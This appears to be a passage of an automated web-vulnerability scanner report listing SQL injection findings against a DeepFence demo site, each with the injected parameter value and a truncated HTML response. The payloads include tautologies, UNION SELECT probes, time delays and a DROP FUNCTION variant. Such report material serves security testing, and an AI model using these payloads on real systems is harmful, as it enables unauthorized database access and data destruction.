Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #588\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 1=0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #589\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ;waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #590\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@\ndeepfence.io;%00\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #591\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin' or 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #592\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 25--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #593\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\" or \"1\"=\"1\"/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #594\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #595Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #596\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A\n')),4,5,6,7,8--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #597\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin\" or \"1\"=\"1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #598\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\n\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\"\nsrc=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-\nbfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- \nBootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:\nimage/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJ\nbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQ\nIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #599\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #600\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #601\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io IF(7423=7423) SELECT 7423 ELSE DROP \nFUNCTION xcjl--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 